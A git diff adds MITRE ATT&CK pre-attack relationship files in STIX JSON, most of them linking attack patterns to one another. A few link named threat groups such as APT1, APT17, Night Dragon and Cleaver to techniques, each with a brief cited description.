"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c", + "relationship_type": "related-to", + "target_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--7bd3d2ba-f114-4835-97b6-1c3e2208d3f3.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--7bd3d2ba-f114-4835-97b6-1c3e2208d3f3.json new file mode 100644 index 0000000000000000000000000000000000000000..7efd132085f61058d59819216917d3b00eb1c403 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--7bd3d2ba-f114-4835-97b6-1c3e2208d3f3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4683a37a-76e2-4e23-ab96-678a967ef2e6", + "spec_version": "2.0", + "objects": [ + { + "id": "relationship--7bd3d2ba-f114-4835-97b6-1c3e2208d3f3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "modified": "2018-10-17T00:14:20.652Z", + "created": "2017-12-14T16:46:06.044Z", + "source_ref": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc", + "relationship_type": "related-to", + "target_ref": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--83379e43-4bc5-4c49-b0b3-f41161e8e96d.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--83379e43-4bc5-4c49-b0b3-f41161e8e96d.json new file mode 100644 index 0000000000000000000000000000000000000000..48ccf67569431f49d35e92883dd0ee31d87d3b25 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--83379e43-4bc5-4c49-b0b3-f41161e8e96d.json 
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--f36a1dce-c607-442a-a9b0-aee0b57bf5ad",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--e5164428-03ca-4336-a9a7-4d9ea1417e59",
+ "target_ref": "attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983",
+ "relationship_type": "related-to",
+ "id": "relationship--83379e43-4bc5-4c49-b0b3-f41161e8e96d",
+ "type": "relationship",
+ "modified": "2019-02-19T18:56:56.770Z",
+ "created": "2019-02-19T18:56:56.770Z"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--87239038-7693-49b3-b595-b828cc2be1ba.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--87239038-7693-49b3-b595-b828cc2be1ba.json
new file mode 100644
index 0000000000000000000000000000000000000000..6a764345c536e47d4f2223c0c2260e59bf889c12
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--87239038-7693-49b3-b595-b828cc2be1ba.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--926ab8e9-ff9d-4b85-9f5f-7ef3f3d9d5df",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--87239038-7693-49b3-b595-b828cc2be1ba",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--103d72e6-7e0d-4b3a-9373-c38567305c33",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--eacd1efe-ee30-4b03-b58f-5b3b1adfe45d"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--8bcaccd1-403b-40f1-82d3-ac4d873263f8.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--8bcaccd1-403b-40f1-82d3-ac4d873263f8.json
new file mode 100644
index 0000000000000000000000000000000000000000..54d9a1f249613255fba18190e88ad5987f9f9c1a
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--8bcaccd1-403b-40f1-82d3-ac4d873263f8.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--69956b60-b3d0-41eb-bb99-53e4a1d448ca",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--8bcaccd1-403b-40f1-82d3-ac4d873263f8",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--0722cd65-0c83-4c89-9502-539198467ab1"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--94daf955-fb3e-4f13-af60-0e3ffa185be0.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--94daf955-fb3e-4f13-af60-0e3ffa185be0.json
new file mode 100644
index 0000000000000000000000000000000000000000..4d6458f1944ed665aafdb0306a8a978b7425c6fa
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--94daf955-fb3e-4f13-af60-0e3ffa185be0.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--332c63e5-7dba-4e07-adb2-6b3ccbb9e702",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--94daf955-fb3e-4f13-af60-0e3ffa185be0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--54eb2bab-125f-4d1c-b999-0c692860bafe",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--20a66013-8dab-4ca3-a67d-766c842c561c"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9524754d-7743-47b3-8395-3cbfb633c020.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9524754d-7743-47b3-8395-3cbfb633c020.json
new file mode 100644
index 0000000000000000000000000000000000000000..35c099d799224e88738ed2cb6b3d48c2cfe50462
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9524754d-7743-47b3-8395-3cbfb633c020.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--fb3e1df6-70cf-47fb-a4d0-51f6d79d72f0",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--9524754d-7743-47b3-8395-3cbfb633c020",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--73e7d7d5-1782-4cd0-a4d7-00c7ec051c2a"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--980656e3-ba60-49ee-9ce8-cbe1a0dc65c5.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--980656e3-ba60-49ee-9ce8-cbe1a0dc65c5.json
new file mode 100644
index 0000000000000000000000000000000000000000..59a21d97d8ba09db490021118ca62dfe8d190941
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--980656e3-ba60-49ee-9ce8-cbe1a0dc65c5.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--480f7314-05d7-4f2b-9612-26ba406a0cff",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662",
+ "target_ref": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077",
+ "external_references": [
+ {
+ "source_name": "Mandiant APT1",
+ "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+ }
+ ],
+ "description": "[APT1](https://attack.mitre.org/groups/G0006) compromised a vast set of 3rd party victim hop points as part of their network infrastructure. For example, [APT1](https://attack.mitre.org/groups/G0006) hijacked FQDNs associated with legitimate websites hosted by hop points. Mandiant considers them to be \u201chijacked\u201d since they were originally registered for a legitimate reason but were used by APT1 for malicious purposes.(Citation: Mandiant APT1)",
+ "relationship_type": "uses",
+ "id": "relationship--980656e3-ba60-49ee-9ce8-cbe1a0dc65c5",
+ "type": "relationship",
+ "modified": "2020-03-25T13:59:27.774Z",
+ "created": "2020-03-25T13:59:27.774Z"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--984d13eb-ba9c-4e7c-8675-85dde9877a81.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--984d13eb-ba9c-4e7c-8675-85dde9877a81.json
new file mode 100644
index 0000000000000000000000000000000000000000..5ec0c694761c7d8195ac6022288428625fcdd3d9
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--984d13eb-ba9c-4e7c-8675-85dde9877a81.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--af697ecf-e489-4c83-a09b-6e9c2cb7599e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--984d13eb-ba9c-4e7c-8675-85dde9877a81",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--a757670d-d600-48d9-8ae9-601d42c184a5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9a1f729c-72a9-4735-9d48-ecb54ea018a9.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9a1f729c-72a9-4735-9d48-ecb54ea018a9.json
new file mode 100644
index 0000000000000000000000000000000000000000..6e0acbfb82583765bc581cc5598cb345af95901f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9a1f729c-72a9-4735-9d48-ecb54ea018a9.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--bc751189-cd29-4dbc-bfac-2be2f89d6623",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--9a1f729c-72a9-4735-9d48-ecb54ea018a9",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--795c1a92-3a26-453e-b99a-6a566aa94dc6",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9ad9966d-4a8d-4b15-b503-c5d27104fcdd.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9ad9966d-4a8d-4b15-b503-c5d27104fcdd.json
new file mode 100644
index 0000000000000000000000000000000000000000..cdabc9e9c41dd1dbc86142c3cb0b4cfb74443ebc
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9ad9966d-4a8d-4b15-b503-c5d27104fcdd.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--e5fc3016-c917-42c4-98c8-bc7d046e5b46",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--9ad9966d-4a8d-4b15-b503-c5d27104fcdd",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9c44b2ec-70b0-4f5c-800e-426477330658.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9c44b2ec-70b0-4f5c-800e-426477330658.json
new file mode 100644
index 0000000000000000000000000000000000000000..8408427a296f73782d2dd8d9d5a39bad4202ff68
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9c44b2ec-70b0-4f5c-800e-426477330658.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--3d153a84-c919-4ebd-8a14-e79700c2a3f2",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--9c44b2ec-70b0-4f5c-800e-426477330658",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--7860e21e-7514-4a3f-8a9d-56405ccfdb0c",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9c87b627-de61-42da-a658-7bdb33358754.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9c87b627-de61-42da-a658-7bdb33358754.json
new file mode 100644
index 0000000000000000000000000000000000000000..b5b456bea3ff52e472ab5dcc624502494d871066
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--9c87b627-de61-42da-a658-7bdb33358754.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--605718c9-966a-4258-b84a-0403a64ee2e1",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--9c87b627-de61-42da-a658-7bdb33358754",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[APT17](https://attack.mitre.org/groups/G0025) obfuscated infrastructure using a multi-layered malware beaconing approach. (Citation: FireEye APT17)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf",
+ "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.",
+ "source_name": "FireEye APT17"
+ }
+ ],
+ "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--72c8d526-1247-42d4-919c-6d7a31ca8f39",
+ "type": "relationship",
+ "modified": "2019-03-22T14:21:19.564Z",
+ "created": "2017-12-14T16:46:06.044Z"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a29f2adc-c328-4cf3-9984-2c0c72ec7061.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a29f2adc-c328-4cf3-9984-2c0c72ec7061.json
new file mode 100644
index 0000000000000000000000000000000000000000..c517d262b887f62d0191693aec90c6fe8e112de4
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a29f2adc-c328-4cf3-9984-2c0c72ec7061.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--9c3a6c9c-9134-40a1-aabd-b525cfdb9a93",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--a29f2adc-c328-4cf3-9984-2c0c72ec7061",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--78e41091-d10d-4001-b202-89612892b6ff",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--59369f72-3005-4e54-9095-3d00efcece73"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a34c16e9-bc7e-45f5-a9a2-8b05d868e6a0.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a34c16e9-bc7e-45f5-a9a2-8b05d868e6a0.json
new file mode 100644
index 0000000000000000000000000000000000000000..04e15f2d8286505e3624aca891c1d7afc8a85ca2
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a34c16e9-bc7e-45f5-a9a2-8b05d868e6a0.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--e3e32a74-befa-4b53-a8e1-83ae097a85de",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--a34c16e9-bc7e-45f5-a9a2-8b05d868e6a0",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Night Dragon](https://attack.mitre.org/groups/G0014) used privately developed and customized remote access tools.(Citation: McAfee Night Dragon)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "source_name": "McAfee Night Dragon",
+ "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.",
+ "url": "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf"
+ }
+ ],
+ "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--9755ecdc-deb0-40e6-af49-713cb0f8ed92",
+ "type": "relationship",
+ "modified": "2019-03-25T14:36:29.918Z",
+ "created": "2017-12-14T16:46:06.044Z"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a7f177e4-7e7f-4883-af3d-c95db9ea7a53.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a7f177e4-7e7f-4883-af3d-c95db9ea7a53.json
new file mode 100644
index 0000000000000000000000000000000000000000..5c164e5557b6ff5f9095e710c6da4e3f6a7ffa45
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--a7f177e4-7e7f-4883-af3d-c95db9ea7a53.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--b0d3b348-c579-4a03-9e2a-0dcf75c88c3c",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--a7f177e4-7e7f-4883-af3d-c95db9ea7a53",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--dfa4eaf4-50d9-49de-89e9-d33f579f3e05",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--856a9371-4f0f-4ea9-946e-f3144204240f"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ab313887-ff00-4aa9-8edb-ab107c517c19.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ab313887-ff00-4aa9-8edb-ab107c517c19.json
new file mode 100644
index 0000000000000000000000000000000000000000..6e314cdf9894c4dae5ea16ec80d10fe907faa7c5
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ab313887-ff00-4aa9-8edb-ab107c517c19.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--dfde58c5-f99e-4356-bec3-48cd0d8b1950",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--ab313887-ff00-4aa9-8edb-ab107c517c19",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--c721b235-679a-4d76-9ae9-e08921fccf84",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--7718e92f-b011-4f88-b822-ae245a1de407"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ab356c7a-6922-4143-90eb-5be632e2f6cd.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ab356c7a-6922-4143-90eb-5be632e2f6cd.json
new file mode 100644
index 0000000000000000000000000000000000000000..83c145267ab7167858dfa1fc7d76d9ac06f64815
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ab356c7a-6922-4143-90eb-5be632e2f6cd.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--02ac2fba-23d9-483d-886d-874f5bfc8403",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--ab356c7a-6922-4143-90eb-5be632e2f6cd",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Cleaver](https://attack.mitre.org/groups/G0003) created fake LinkedIn profiles.(Citation: Dell Threat Group 2889)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/",
+ "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.",
+ "source_name": "Dell Threat Group 2889"
+ }
+ ],
+ "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--9108e212-1c94-4f8d-be76-1aad9b4c86a4",
+ "type": "relationship",
+ "modified": "2019-03-22T20:00:23.846Z",
+ "created": "2017-12-14T16:46:06.044Z"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ac1dfc58-d5a2-4b6f-9bf4-c6c0d2d3ae80.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ac1dfc58-d5a2-4b6f-9bf4-c6c0d2d3ae80.json
new file mode 100644
index 0000000000000000000000000000000000000000..f4188fc086efd804d53a0b9638b03bc172a6f9c0
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ac1dfc58-d5a2-4b6f-9bf4-c6c0d2d3ae80.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--0c1a8c65-3721-473c-8449-2f2341f39883",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--ac1dfc58-d5a2-4b6f-9bf4-c6c0d2d3ae80",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--73e7d7d5-1782-4cd0-a4d7-00c7ec051c2a",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--5b6ce031-bb86-407a-9984-2b9700ac4549"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ad510f42-e745-42d0-8b54-4bf7a2f3cf34.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ad510f42-e745-42d0-8b54-4bf7a2f3cf34.json
new file mode 100644
index 0000000000000000000000000000000000000000..02ac9aa32cd56bf7a40bfeb1dfd02cb946164360
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--ad510f42-e745-42d0-8b54-4bf7a2f3cf34.json
@@ -0,0 +1,20 @@
+{
+ "type": "bundle",
+ "id": "bundle--b0658dc9-8814-41ed-a8da-b599fa53a5be",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--ad510f42-e745-42d0-8b54-4bf7a2f3cf34",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "relationship",
+ "modified": "2018-10-17T00:14:20.652Z",
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "attack-pattern--af358cad-eb71-4e91-a752-236edc237dae",
+ "relationship_type": "related-to",
+ "target_ref": "attack-pattern--74a3288e-eee9-4f8e-973a-fbc128e033f1"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--b09b41c4-670f-4f00-b8d5-a8c6a2dcfcfb.json b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--b09b41c4-670f-4f00-b8d5-a8c6a2dcfcfb.json
new file mode 100644
index 0000000000000000000000000000000000000000..d4bef6a4253096a375977eb57135c1eb0a84662f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/relationship/relationship--b09b41c4-670f-4f00-b8d5-a8c6a2dcfcfb.json
@@ -0,0 +1,28 @@
+{
+ "type": "bundle",
+ "id": "bundle--694a4c48-e875-49dc-99e6-81793b10ebb9",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "id": "relationship--b09b41c4-670f-4f00-b8d5-a8c6a2dcfcfb",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Cleaver](https://attack.mitre.org/groups/G0003) has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.(Citation: Cylance Cleaver)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "source_name": "Cylance Cleaver",
+ "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.",
+ "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
+ }
+ ],
+ "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--fddd81e9-dd3d-477e-9773-4fb8ae227234",
+ "type": "relationship",
+ "modified": "2019-03-22T20:00:23.891Z",
+ "created": "2017-12-14T16:46:06.044Z"
+ }
+ ]
+}
\ No newline at end of file
